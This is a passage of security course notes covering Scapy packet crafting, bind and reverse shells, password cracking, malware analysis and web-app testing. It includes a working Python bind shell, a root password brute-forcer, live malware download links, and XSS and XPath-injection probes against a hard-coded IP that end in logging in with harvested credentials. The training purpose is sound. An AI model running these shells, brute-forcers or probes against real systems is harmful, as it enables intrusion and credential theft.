  2024.  
  2025.     sr1(i/ic)
  2026.  
  2027.  
  2028.  
  2029.  
  2030.  
This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. The response is shown, with ICMP type echo-reply.
  2032.  
  2033. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
  2034.  
  2035. Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
  2036.  
  2037.  
  2038.     sr1(i/ic/"YOUR NAME")
  2039.  
  2040.  
  2041. You should see a reply with a Raw section containing your name.
  2042.  
  2043.  
  2044.  
  2045. ##############################################
  2046. # Lesson 22: Sending a UDP Packet with Scapy #
  2047. ##############################################
  2048.  
  2049.  
  2050. Preparing the Target
  2051. $ ncat -ulvp 4444
  2052.  
  2053.  
  2054.  
  2055.  
  2056. --open another terminal--
  2057. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  2058.  
  2059.     u = UDP()
  2060.  
  2061.     u.display()
  2062.  
  2063.  
  2064.  
  2065. This creates an object named u of type UDP, and displays its properties.
  2066.  
  2067. Execute these commands to change the destination port to 4444 and display the properties again:
  2068.  
  2069.     i.dst="10.10.2.97"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  2070.  
  2071.     u.dport = 4444
  2072.  
  2073.     u.display()
  2074.  
  2075.  
  2076.  
  2077. Execute this command to send the packet to the Windows machine:
  2078.  
  2079.     send(i/u/"YOUR NAME SENT VIA UDP\n")
  2080.  
  2081.  
  2082.  
  2083. On the Windows target, you should see the message appear
  2084.  
  2085.  
  2086.  
  2087.  
  2088. #######################################
  2089. # Lesson 23: Ping Sweeping with Scapy #
  2090. #######################################
  2091.  
  2092.  
  2093.  
#!/usr/bin/python
from scapy.all import *

TIMEOUT = 2
conf.verb = 0
for ip in range(0, 256):
    # You will need to change 10.10.30 below to the subnet for your network
    packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
    reply = sr1(packet, timeout=TIMEOUT)
    if reply is not None:
        # reply.src is the host that answered; reply.dst would be our own address
        print reply.src, "is online"
    else:
        print "Timeout waiting for %s" % packet[IP].dst
  2107.  
  2108.  
  2109.  
  2110. ###############################################
  2111. # Checking out some scapy based port scanners #
  2112. ###############################################
  2113.  
  2114. wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
  2115.  
  2116. cat rdp_scan.py
  2117.  
  2118. sudo python rdp_scan.py
  2119.  
  2120.  
  2121. ######################################
  2122. # Dealing with conf.verb=0 NameError #
  2123. ######################################
  2124.  
  2125. conf.verb = 0
  2126. NameError: name 'conf' is not defined
  2127.  
  2128. Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
  2129.  
  2130. from scapy import *
  2131.     to
  2132. from scapy.all import *
  2133.  
  2134.  
  2135.  
  2136. Reference:
  2137. http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
  2138.  
  2139.  
conf.verb=0 is a verbosity setting (conf is scapy's configuration object, verb its verbosity level); setting it to 0 suppresses the send/receive progress messages scapy prints by default, which is what you want inside a script.
  2141.  
  2142.  
  2143.  
  2144. Here are some good Scapy references:
  2145. http://www.secdev.org/projects/scapy/doc/index.html
  2146. http://resources.infosecinstitute.com/port-scanning-using-scapy/
  2147. http://www.hackerzvoice.net/ouah/blackmagic.txt
  2148. http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
  2149.  
  2150.  
  2151. ######################################
  2152. # Lesson 24: Bind and Reverse Shells #
  2153. ######################################
  2154. vi simplebindshell.py
  2155.  
  2156.  
#!/usr/bin/python
import os,sys,socket

ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print '-Creating socket..'
port = 31337
try:
    ls.bind(('', port))
    print '-Binding the port on '
    ls.listen(1)
    print '-Listening, '
    print '-Waiting for connection...'
    (conn, addr) = ls.accept()
    cli= conn.fileno()
    print '-Redirecting shell...'
    os.dup2(cli, 0)
    print 'In, '
    os.dup2(cli, 1)
    print 'Out, '
    os.dup2(cli, 2)
    print 'Err'
    print 'Done!'
    arg0='/bin/sh'
    arg1='-a'
    args=[arg0]+[arg1]
    os.execv(arg0, args)
except socket.error:
    print 'fail\n'
    ls.close()
    sys.exit(1)
  2187.  
  2188.  
  2189.  
  2190.  
  2191.  
  2192.  
  2193.  
  2194. nc TARGETIP 31337
  2195.  
  2196.  
  2197.  
  2198. ---------------------
  2199. Preparing the target for a reverse shell
  2200. $ ncat -lvp 4444
  2201.  
  2202.  
  2203.  
  2204. --open another terminal--
  2205. wget https://www.trustedsec.com/files/simple_py_shell.py
  2206.  
  2207. vi simple_py_shell.py
  2208.  
  2209.  
  2210.  
  2211.  
  2212.  
  2213.  
  2214. -------------------------------
  2215. Tricky shells
  2216.  
  2217. Reference:
  2218. http://securityweekly.com/2011/10/python-one-line-shell-code.html
  2219. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
  2220.  
  2221.  
  2222.  
  2223.  
  2224.  
  2225.  
#############################
# Reference Videos To Watch #
#############################
Here is your third set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)



#################################################
# Lesson 25: Python Functions & String Handling #
#################################################

Python can make use of functions:
http://www.tutorialspoint.com/python/python_functions.htm


Python can interact with the 'crypt' function used to create Unix passwords:
http://docs.python.org/2/library/crypt.html


Tonight we will see a lot of the split() method so be sure to keep the following references close by:
http://www.tutorialspoint.com/python/string_split.htm


Tonight we will see a lot of slicing so be sure to keep the following references close by:
http://techearth.net/python/index.php5?title=Python:Basics:Slices



################################
# Lesson 26: Password Cracking #
################################

wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py

vi htcrack.py

vi list.txt

hello
goodbye
red
blue
yourname
tim
bob


htpasswd -nd yourname
    - enter yourname as the password


python htcrack.py joe:7XsJIbCFzqg/o list.txt



sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc

rm -rf mechanize-0.2.5.tar.gz

sudo /bin/bash

passwd
    ***set root password***



vi rootbrute.py


#!/usr/bin/env python

import sys
try:
        import pexpect
except(ImportError):
        print "\nYou need the pexpect module."
        print "http://www.noah.org/wiki/Pexpect\n"
        sys.exit(1)

# Change this if needed: the exact failure message su prints differs between distributions.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"

def brute(word):
        print "Trying:",word
        child = pexpect.spawn('/bin/su')
        child.expect('Password: ')
        child.sendline(word)
        # expect() returns the index of whichever pattern matched first:
        # 0 = a root prompt, 1 = LOGIN_ERROR, 2 = nothing matched within 3 seconds
        i = child.expect(['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
        if i == 1:
                print "Incorrect Password"

        if i == 2:
                print "\n\t[!] Root Password:" ,word
                child.sendline ('id')
                print child.before
                child.interact()

if len(sys.argv) != 2:
        print "\nUsage : ./rootbrute.py <wordlist>"
        print "Eg: ./rootbrute.py words.txt\n"
        sys.exit(1)

try:
        words = open(sys.argv[1], "r").readlines()
except(IOError):
        print "\nError: Check your wordlist path\n"
        sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
        brute(word.replace("\n",""))



References you might find helpful:
http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python



wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py

vi md5crack.py



Why use hexdigest:
http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string


http://md5online.net/



wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py



#############################
# Reference Videos To Watch #
#############################
Here is your fourth set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)



###############################
# Lesson 28: Malware Analysis #
###############################



############################
# Download the Analysis VM #
############################
https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts


- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.

- After logging in, please open a terminal window and type the following commands:

cd Desktop/


- This is actual malware (remember to run it in a VM - the password to extract it is 'infected'):

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py

unzip malware-password-is-infected.zip
    infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'?***
Reference:
http://www.garykessler.net/library/file_sigs.html


objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

                            - We didn't see anything like HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list


                            - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile

vi analyse_malware.py

python analyse_malware.py malware.exe



Building a Malware Scanner
--------------------------

mkdir ~/Desktop/malwarescanner

cd ~/Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir ~/Desktop/malcode

cp ~/Desktop/malware.exe ~/Desktop/malcode

python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt

cp ~/Desktop/



#####################################################
# Analyzing Macro Embedded Malware                  #
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
#####################################################
cp ~/Desktop/

- Create a FREE account on:
https://malwr.com/account/signup/

- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/

file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin



sudo pip install olefile

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .

mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.


python oledump.py 064016.doc -s A5 -v

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.


python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
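The hex-to-ASCII step above, as an added Python 3 example that is not part of the course or of oledump: it pulls double-quoted hex blobs out of macro source and decodes them locally, so nothing has to be pasted into a website. SAMPLE_VBA is a constructed stand-in for an obfuscated module, not the real Dridex macro, and its blob decodes to a harmless echo command.

```python
import re
import string

# Constructed stand-in for an obfuscated VBA module (NOT the macro from the
# real sample): the command string is stored as one long hex literal, next to
# decoy statements, and rebuilt at run time.
SAMPLE_VBA = '''
Sub GVhkjbjv()
    Dim qq As String
    qq = "636D64202F63206563686F20616E616C797369732D73616D706C653B"
    Dim zz As Long
    zz = 1000000
End Sub
'''

# A double-quoted run of hex digit pairs; the caller filters on length.
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')

def find_hex_blobs(vba_source, min_bytes=8):
    """Every quoted hex blob in the macro text that is at least min_bytes long."""
    return [m.group(1) for m in HEX_LITERAL.finditer(vba_source)
            if len(m.group(1)) >= 2 * min_bytes]

def decode_hex_blob(blob):
    """Decode a hex blob to text; None when the bytes are not printable ASCII."""
    raw = bytes.fromhex(blob)
    if all(chr(b) in string.printable for b in raw):
        return raw.decode('ascii')
    return None

def decode_macro_strings(vba_source):
    """Report each blob the way the notes describe it (first/last two bytes) plus its decoding."""
    findings = []
    for blob in find_hex_blobs(vba_source):
        findings.append({'starts': blob[:4].upper(), 'ends': blob[-4:].upper(),
                         'length': len(blob) // 2, 'text': decode_hex_blob(blob)})
    return findings

if __name__ == '__main__':
    for finding in decode_macro_strings(SAMPLE_VBA):
        print(finding)
```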



##############
# Yara Ninja #
##############
cd ~/Desktop

sudo apt-get remove -y yara

wget https://github.com/plusvic/yara/archive/v3.4.0.zip

sudo apt-get -y install libtool

unzip v3.4.0.zip

cd yara-3.4.0

./bootstrap.sh

./configure

make

sudo make install

yara -v

cd ..

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd ~/Desktop

yara rules-master/packer.yar malcode/malware.exe


Places to get more Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara



Yara rule sorting script:
-------------------------
https://github.com/mkayoh/yarasorter



cd ~/Desktop/rules-master
for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
cd ~/Desktop/
yara rules-master/master.yar malcode/malware.exe



Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2


Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/



###############################
# Creating a Malware Database #
###############################

Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
unzip malware-password-is-infected.zip
    infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e



Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing the MySQL database
- Run the following command in the terminal:

sudo apt-get install mysql-server

- Step 2: Installing the Python MySQLdb module
- Run the following commands in the terminal:

sudo apt-get build-dep python-mysqldb
sudo apt-get install python-mysqldb

- Step 3: Logging in
- Run the following command in the terminal:

mysql -u root -p                    (set a password of 'malware')

- Then create one database by running the following command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py                     (fill in database connection information)

python mal_to_db.py -i

python mal_to_db.py -f malware.exe -u


mysql -u root -p
    malware

mysql> use malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;
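An added Python 3 example, not the course's scanner.py, avsubmit.py or mal_to_db.py, that ties the "Building a Malware Scanner" section (a hash list plus indicator strings run over a directory, with the MZ/PE check from the hexdump step) to the database sections above (the same id, md5, sha1, sha256, time columns, in sqlite rather than MySQL). The sample PE, the hash list and the indicator list are all constructed here, so it runs offline on a scratch directory.

```python
import hashlib
import os
import re
import sqlite3
import tempfile
import time

# Constructed sample: a file with a valid MZ/PE layout and a few IRC-bot style
# strings. It is NOT the course's malware.exe and it cannot execute.
def build_sample_pe():
    header = bytearray(0x80)
    header[0:2] = b'MZ'                               # DOS magic, hexdump shows 4d 5a
    header[0x3c:0x40] = (0x80).to_bytes(4, 'little')  # e_lfanew: offset of the PE header
    body = (b'PE\x00\x00' + bytes(20) +
            b'\x00kernel32.dll\x00irc.example.invalid:6667\x00JOIN #sample\x00PRIVMSG\x00')
    return bytes(header) + body

def pe_magic(data):
    """'PE', 'MZ-only' (DOS stub without a PE header) or 'not-MZ'."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return 'not-MZ'
    e_lfanew = int.from_bytes(data[0x3c:0x40], 'little')
    if data[e_lfanew:e_lfanew + 4] == b'PE\x00\x00':
        return 'PE'
    return 'MZ-only'

def extract_strings(data, min_len=4):
    """Printable ASCII runs, the same thing strings(1) prints by default."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [m.group(0).decode('ascii') for m in re.finditer(pattern, data)]

def file_hashes(data):
    return {name: hashlib.new(name, data).hexdigest() for name in ('md5', 'sha1', 'sha256')}

def init_db(db_path):
    """Same columns the course queries later: id, md5, sha1, sha256, time."""
    con = sqlite3.connect(db_path)
    con.execute('CREATE TABLE IF NOT EXISTS files (id INTEGER PRIMARY KEY, name TEXT, '
                'md5 TEXT, sha1 TEXT, sha256 TEXT UNIQUE, pe TEXT, time TEXT)')
    con.commit()
    con.close()

def scan_directory(directory, known_hashes, indicators, db_path):
    """Hash every file, flag known-bad hashes and indicator strings, record each file in the DB."""
    results = []
    con = sqlite3.connect(db_path)
    for root, _, names in os.walk(directory):
        for name in sorted(names):
            with open(os.path.join(root, name), 'rb') as fh:
                data = fh.read()
            h = file_hashes(data)
            strs = extract_strings(data)
            found = sorted({ind for ind in indicators
                            if any(ind.lower() in s.lower() for s in strs)})
            kind = pe_magic(data)
            con.execute('INSERT OR IGNORE INTO files (name, md5, sha1, sha256, pe, time) '
                        'VALUES (?, ?, ?, ?, ?, ?)',
                        (name, h['md5'], h['sha1'], h['sha256'], kind, time.strftime('%Y-%m-%d %H:%M:%S')))
            results.append({'name': name, 'pe': kind, 'indicators': found,
                            'hash_hit': h['md5'] in known_hashes or h['sha256'] in known_hashes, **h})
    con.commit()
    con.close()
    return results

def query_files(db_path):
    con = sqlite3.connect(db_path)
    rows = con.execute('SELECT id, md5, sha1, sha256, time FROM files ORDER BY id').fetchall()
    con.close()
    return rows

def demo():
    """Scan a scratch directory holding one sample PE and one text file; return (results, rows)."""
    workdir = tempfile.mkdtemp(prefix='malcode-')
    sample_dir = os.path.join(workdir, 'malcode')
    os.mkdir(sample_dir)
    sample = build_sample_pe()
    with open(os.path.join(sample_dir, 'sample.exe'), 'wb') as fh:
        fh.write(sample)
    with open(os.path.join(sample_dir, 'notes.txt'), 'wb') as fh:
        fh.write(b'meeting notes, nothing to see here\n')
    known = {hashlib.sha256(sample).hexdigest()}          # stands in for hashes.txt
    indicators = ['dll', 'hkey', 'irc', 'join', 'admin']  # stands in for strings.txt
    db_path = os.path.join(workdir, 'malware.db')         # kept outside the scanned directory
    init_db(db_path)
    return scan_directory(sample_dir, known, indicators, db_path), query_files(db_path)

if __name__ == '__main__':
    results, rows = demo()
    for r in results:
        print(r['name'], r['pe'], 'KNOWN-BAD' if r['hash_hit'] else 'unknown', r['indicators'])
    for row in rows:
        print(row)
```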



######################################
# PCAP Analysis with forensicPCAP.py #
######################################
cd ~/Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
sudo easy_install cmd2

python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap

ForPCAP >>> help


Prints stats about the PCAP:
ForPCAP >>> stat


Prints all DNS requests from the PCAP file. The id before each request is the packet's id, which can be used with the "show" command.
ForPCAP >>> dns

ForPCAP >>> show


Prints all destination ports from the PCAP file. The id before each port is the packet's id, which can be used with the "show" command.
ForPCAP >>> dstports

ForPCAP >>> show


Prints the number of source IPs and stores them:
ForPCAP >>> ipsrc


Prints the number of web requests and stores them:
ForPCAP >>> web


Prints the number of mail requests and stores them:
ForPCAP >>> mail
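The dns, dstports and ipsrc views above, as an added Python 3 example that is not forensicPCAP.py: a minimal classic-pcap reader for Ethernet/IPv4 frames that pulls the first question name out of each DNS query and counts destination ports and source addresses by packet id. The capture it parses is constructed in memory by the builder functions (documentation-range addresses), not the course's suspicious-time.pcap.

```python
import socket
import struct
from collections import Counter

# --- builders for the constructed sample capture (not the course's suspicious-time.pcap) ---
def build_dns_query(name):
    qname = b''.join(bytes([len(label)]) + label.encode() for label in name.split('.')) + b'\x00'
    return struct.pack('!HHHHHH', 0x1234, 0x0100, 1, 0, 0, 0) + qname + struct.pack('!HH', 1, 1)

def build_udp(sport, dport, payload):
    return struct.pack('!HHHH', sport, dport, 8 + len(payload), 0) + payload   # checksum left zero

def build_tcp_syn(sport, dport):
    return struct.pack('!HHIIBBHHH', sport, dport, 1, 0, 5 << 4, 0x02, 8192, 0, 0)

def build_ipv4_frame(src, dst, proto, payload):
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return bytes(12) + b'\x08\x00' + ip + payload   # Ethernet: zero MACs, EtherType IPv4

def build_pcap(frames):
    out = struct.pack('<IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)   # linktype 1 = Ethernet
    for i, frame in enumerate(frames):
        out += struct.pack('<IIII', 1496000000 + i, 0, len(frame), len(frame)) + frame
    return out

def build_sample_pcap():
    return build_pcap([
        build_ipv4_frame('192.0.2.10', '192.0.2.1', 17, build_udp(40000, 53, build_dns_query('update.example.test'))),
        build_ipv4_frame('192.0.2.10', '198.51.100.7', 6, build_tcp_syn(40001, 80)),
        build_ipv4_frame('192.0.2.10', '192.0.2.1', 17, build_udp(40002, 53, build_dns_query('irc.example.test'))),
        build_ipv4_frame('192.0.2.11', '198.51.100.9', 6, build_tcp_syn(40003, 6667)),
    ])

# --- parser ---
def read_pcap(data):
    """Return (linktype, [(ts_sec, frame_bytes), ...]) from a classic pcap file image."""
    endian = {0xa1b2c3d4: '<', 0xd4c3b2a1: '>'}.get(struct.unpack('<I', data[:4])[0])
    if endian is None:
        raise ValueError('not a pcap file')
    linktype = struct.unpack(endian + 'I', data[20:24])[0]
    packets, offset = [], 24
    while offset + 16 <= len(data):
        ts_sec, _usec, incl_len, _orig = struct.unpack(endian + 'IIII', data[offset:offset + 16])
        offset += 16
        packets.append((ts_sec, data[offset:offset + incl_len]))
        offset += incl_len
    return linktype, packets

def parse_frame(frame):
    """Ethernet/IPv4 only: addresses, protocol, TCP/UDP ports and the transport payload."""
    if len(frame) < 34 or frame[12:14] != b'\x08\x00':
        return None
    ihl, proto = (frame[14] & 0x0f) * 4, frame[23]
    l4 = frame[14 + ihl:]
    sport = dport = None
    payload = b''
    if proto in (6, 17) and len(l4) >= (8 if proto == 17 else 20):
        sport, dport = struct.unpack('!HH', l4[:4])
        payload = l4[8:] if proto == 17 else l4[(l4[12] >> 4) * 4:]   # TCP data offset
    return {'src': socket.inet_ntoa(frame[26:30]), 'dst': socket.inet_ntoa(frame[30:34]),
            'proto': proto, 'sport': sport, 'dport': dport, 'payload': payload}

def dns_query_name(payload):
    """Name from the first question of a DNS message, or None."""
    if len(payload) < 12 or struct.unpack('!H', payload[4:6])[0] == 0:
        return None
    labels, offset = [], 12
    while offset < len(payload):
        n = payload[offset]
        offset += 1
        if n == 0:
            break
        if n & 0xc0:   # compression pointers do not belong in a question name
            return None
        labels.append(payload[offset:offset + n].decode('ascii', 'replace'))
        offset += n
    return '.'.join(labels)

def summarize(pcap_bytes):
    """The dns / dstports / ipsrc views, keyed by 1-based packet id like the ForPCAP prompt."""
    _, packets = read_pcap(pcap_bytes)
    dns, dstports, ipsrc = [], Counter(), Counter()
    for pkt_id, (_ts, frame) in enumerate(packets, 1):
        p = parse_frame(frame)
        if p is None:
            continue
        ipsrc[p['src']] += 1
        if p['dport'] is not None:
            dstports[p['dport']] += 1
        if p['proto'] == 17 and p['dport'] == 53:
            name = dns_query_name(p['payload'])
            if name:
                dns.append((pkt_id, name))
    return {'dns': dns, 'dstports': dstports, 'ipsrc': ipsrc}

if __name__ == '__main__':
    for view, value in summarize(build_sample_pcap()).items():
        print(view, value)
```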



###################
# Memory Analysis #
###################
cd /home/malware/Desktop/Banking\ Troubles/Volatility

python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
                ***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf



cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js

cat malicious.js


*****Sorry - no time to cover JavaScript de-obfuscation today*****


cd /home/malware/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done



Start with simple Firefox add-ons:

- ShowIP                https://addons.mozilla.org/en-US/firefox/addon/showip/
- Server Spy            https://addons.mozilla.org/en-US/firefox/addon/server-spy/
- FoxyProxy             https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
- Tamper Data           https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Wappalyzer            https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

A good list of web app testing add-ons for Firefox:
https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/



##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you to reference the OWASP Testing Guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

    1. Does the website talk to a DB?
        - Look for parameter passing (ex: site.com/page.php?id=4)
        - If yes - try SQL Injection

    2. Can I or someone else see what I type?
        - If yes - try XSS

    3. Does the page reference a file?
        - If yes - try LFI/RFI

Let's start with some manual testing against 54.149.82.150


Start here:
http://54.149.82.150/


There's no parameter passing on the home page so the answer to question 1 is NO.
There is however a search box in the top right of the webpage, so the answer to question 2 is YES.

Try an XSS in the search box on the home page:
<script>alert(123);</script>

Doing this gives us the following in the address bar:
http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>

Ok, so we've verified that there is XSS in the search box.

Let's move on to the search box in the left of the page.

Let's give the newsletter signup box a shot.

Moving on to the login page.
http://54.149.82.150/login.aspx

I entered a single quote (') for both the user name and the password. I got the following error:

-----------------------------------------------------------------
 'Users//User[@Name=''' and @Password=''']' has an invalid token.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.

Source Error:


Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
Line 113:            string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
Line 114:            XmlNodeList xmln = doc.SelectNodes(credential);
Line 115:            //String test = xmln.ToString();
Line 116:            if (xmln.Count > 0)

-----------------------------------------------------------------


Hmm....System.Xml.XPath.XPathException.....that's not SQL.

WTF is this:
Line 112:            doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
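Added Python 3 example, not the application's own code: the concatenation from line 113 of the stack trace reproduced, next to a version that turns each input into a proper XPath 1.0 string literal (falling back to concat() when a value holds both quote kinds), plus a skeleton() helper that strips literals so you can see which part of the predicate user input still controls. It fixes only the injection; the plaintext credential file under the web root is a separate problem.

```python
def vulnerable_credential_xpath(user_name, password):
    """The lookup from line 113 of the stack trace: input is pasted straight into the XPath."""
    return "Users//User[@Name='" + user_name + "' and @Password='" + password + "']"

def xpath_literal(value):
    """Encode an arbitrary string as an XPath 1.0 string literal.

    XPath 1.0 has no escape sequences inside literals, so a value that contains
    both quote kinds has to be rebuilt with concat().
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i:
            pieces.append('"\'"')            # the single quote itself, double-quoted
        if part:
            pieces.append("'" + part + "'")
    return 'concat(' + ', '.join(pieces) + ')'

def hardened_credential_xpath(user_name, password):
    """Same lookup, but each user-supplied value is one literal and cannot close the predicate."""
    return 'Users//User[@Name=%s and @Password=%s]' % (xpath_literal(user_name), xpath_literal(password))

def skeleton(expr):
    """Replace every string literal with LIT: what the XPath engine sees as structure."""
    out, quote = [], None
    for ch in expr:
        if quote:
            if ch == quote:
                quote = None
        elif ch in '\'"':
            quote = ch
            out.append('LIT')
        else:
            out.append(ch)
    return ''.join(out)

if __name__ == '__main__':
    for fn in (vulnerable_credential_xpath, hardened_credential_xpath):
        expr = fn("'", "'")        # the single-quote probe from the login page
        print(expr)
        print('   structure:', skeleton(expr))
```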



In this case you'll have to trap the request with a proxy like:
- Firefox Tamper Data
- Burp Suite            http://www.portswigger.net/Burp/proxy.html
- WebScarab             https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- Rat Proxy             https://code.google.com/p/ratproxy/
- Zap Proxy             https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
- Paros                 http://sourceforge.net/projects/paros/



Let's go back to that page error message.....


Let's check it out:
http://54.149.82.150/AuthInfo.xml

Looks like we found passwords!!!!!!!!!!


Looks like there is no significant new functionality after logging in with the stolen credentials.

Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links:


